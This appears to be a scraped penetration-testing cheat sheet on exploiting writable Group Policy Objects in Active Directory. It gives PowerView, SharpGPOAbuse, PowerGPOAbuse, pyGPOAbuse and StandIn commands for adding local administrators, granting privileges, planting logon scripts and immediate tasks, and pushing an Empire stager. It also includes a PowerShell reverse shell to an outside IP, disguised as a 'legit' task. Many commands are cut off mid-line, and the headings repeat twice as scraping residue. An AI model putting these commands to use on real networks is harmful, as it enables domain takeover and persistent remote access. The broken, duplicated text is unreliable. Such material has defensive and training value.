Group Policy Objects (GPO) Exploitation

Tools: Bloodhound, PowerGPOAbuse, SharpGPOAbuse, pyGPOAbuse, Powerview, StandIn

Location stored: SYSVOL directory

Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner

GPO Prioritization: Organization Unit > Domain > Site > Local

GPO are stored in the DC in \<domain.dns>\SYSVOL<domain.dns>\Policies<GPOName>\ , inside two folders User and Machine. If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at Machine\Preferences\ScheduledTasks .

Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command:

gpupdate /force .

Finding vulnerable GPO

Look a GPLink where you have the Write right.

Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*WriteProperty*" }

1)

runas /netonly /user:DOMAIN\AD_USERNAME cmd.exe

2)

dir \\DOMAIN\sysvol

3) mmc

4) File -> Add/Remove Snap-in

5) Group Policy Management then click Add

6) OK

7) Navigate to GPO our user has permission to modify

8) Right-click on GPO and select edit

Add our account to local groups

1) Expand Computer Configuration

2) Expand Policies

3) Expand Windows Settings

4) Expand Security Settings

5) Right-click on Restricted Groups and select Add Group

6) Click browse, enter IT Support (example) and click Check Names

7) Click OK twice

8) On second filter, add Administrators and Remote Desktop Users groups

9) Apply and OK then WAIT FOR 15 MINUTES FOR THE GPO TO BE APPLIED

SharpGPOAbuse https://github.com/FSecureLABS/SharpGPOAbuse

1) Build and configure SharpGPOAbuse

Install-Package CommandLineParser -Version 1.9.3.15

$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.

2) Adding User Rights

.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight"

3) Adding a Local Admin

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

4) Configuring a User or Computer Logon script

.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents

5) Configuring a Computer or User Immediate Task

/!\ Intended to "run once" per GPO refresh, not run once per system

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command

.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\

PowerGPOAbuse https://github.com/rootSySdk/PowerGPOAbuse

1) Run the module

PS> . .\PowerGPOAbuse.ps1

2) Adding a localadmin

PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'

3) Assign a new right

PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'

4) Adding a New Computer/User script

PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get

5) Create an immediate task

PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments

pyGPOAbuse https://github.com/Hackndo/pyGPOAbuse

1) Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

2) Reverse shell

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

-powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234); -taskname "Completely Legit Task" -description "Dis is legit, pliz no delete" -user

Powerview

1) Enumerate GPO

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

2) New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO

New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments

StandIn https://github.com/FuzzySecurity/StandIn

1) Add a local administrator

StandIn.exe --gpo --filter Shards --localadmin user002

2) Set custom right to a user

StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege

3) Execute custom command

StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK

PreviousGPO NextFinding vulnerable GPO

Last updated 4 months ago

hashtagTools: Bloodhound, PowerGPOAbuse, SharpGPOAbuse, pyGPOAbuse, Powerview, StandIn

hashtagLocation stored: SYSVOL directory

hashtagCreators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner

hashtagGPO Prioritization: Organization Unit > Domain > Site > Local

hashtagGPO are stored in the DC in \<domain.dns>\SYSVOL<domain.dns>\Policies<GPOName>\ , inside two folders User and Machine. If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at Machine\Preferences\ScheduledTasks .

hashtagDomain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command:

hashtagFinding vulnerable GPO

hashtagLook a GPLink where you have the Write right.

hashtag1)

hashtag2)

hashtag3) mmc

hashtag4) File -> Add/Remove Snap-in

hashtag5) Group Policy Management then click Add

hashtag6) OK

hashtag7) Navigate to GPO our user has permission to modify

hashtag8) Right-click on GPO and select edit

hashtagAdd our account to local groups

hashtag1) Expand Computer Configuration

hashtag2) Expand Policies

hashtag3) Expand Windows Settings

hashtag4) Expand Security Settings

hashtag5) Right-click on Restricted Groups and select Add Group

hashtag6) Click browse, enter IT Support (example) and click Check Names

hashtag7) Click OK twice

hashtag8) On second filter, add Administrators and Remote Desktop Users groups

hashtag9) Apply and OK then WAIT FOR 15 MINUTES FOR THE GPO TO BE APPLIED

hashtagSharpGPOAbuse https://github.com/FSecureLABS/SharpGPOAbuse

hashtag1) Build and configure SharpGPOAbuse

hashtag2) Adding User Rights

hashtag3) Adding a Local Admin

hashtag4) Configuring a User or Computer Logon script

hashtag5) Configuring a Computer or User Immediate Task

hashtag/!\ Intended to "run once" per GPO refresh, not run once per system

hashtagPowerGPOAbuse https://github.com/rootSySdk/PowerGPOAbuse

hashtag1) Run the module

hashtag2) Adding a localadmin

hashtag3) Assign a new right

hashtag4) Adding a New Computer/User script

hashtag5) Create an immediate task

hashtagpyGPOAbuse https://github.com/Hackndo/pyGPOAbuse

hashtag1) Add john user to local administrators group (Password: H4x00r123..)

hashtag2) Reverse shell

hashtagPowerview

hashtag1) Enumerate GPO

hashtag2) New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO

hashtagStandIn https://github.com/FuzzySecurity/StandIn

hashtag1) Add a local administrator

hashtag2) Set custom right to a user

hashtag3) Execute custom command

Tools: Bloodhound, PowerGPOAbuse, SharpGPOAbuse, pyGPOAbuse, Powerview, StandIn

Location stored: SYSVOL directory

Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner

GPO Prioritization: Organization Unit > Domain > Site > Local

GPO are stored in the DC in \<domain.dns>\SYSVOL<domain.dns>\Policies<GPOName>\ , inside two folders User and Machine. If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at Machine\Preferences\ScheduledTasks .

Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command:

Finding vulnerable GPO

Look a GPLink where you have the Write right.

1)

2)

3) mmc

4) File -> Add/Remove Snap-in

5) Group Policy Management then click Add

6) OK

7) Navigate to GPO our user has permission to modify

8) Right-click on GPO and select edit

Add our account to local groups

1) Expand Computer Configuration

2) Expand Policies

3) Expand Windows Settings

4) Expand Security Settings

5) Right-click on Restricted Groups and select Add Group

6) Click browse, enter IT Support (example) and click Check Names

7) Click OK twice

8) On second filter, add Administrators and Remote Desktop Users groups

9) Apply and OK then WAIT FOR 15 MINUTES FOR THE GPO TO BE APPLIED

SharpGPOAbuse https://github.com/FSecureLABS/SharpGPOAbuse

1) Build and configure SharpGPOAbuse

2) Adding User Rights

3) Adding a Local Admin

4) Configuring a User or Computer Logon script

5) Configuring a Computer or User Immediate Task

/!\ Intended to "run once" per GPO refresh, not run once per system

PowerGPOAbuse https://github.com/rootSySdk/PowerGPOAbuse

1) Run the module

2) Adding a localadmin

3) Assign a new right

4) Adding a New Computer/User script

5) Create an immediate task

pyGPOAbuse https://github.com/Hackndo/pyGPOAbuse

1) Add john user to local administrators group (Password: H4x00r123..)

2) Reverse shell

Powerview

1) Enumerate GPO

2) New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO

StandIn https://github.com/FuzzySecurity/StandIn

1) Add a local administrator

2) Set custom right to a user

3) Execute custom command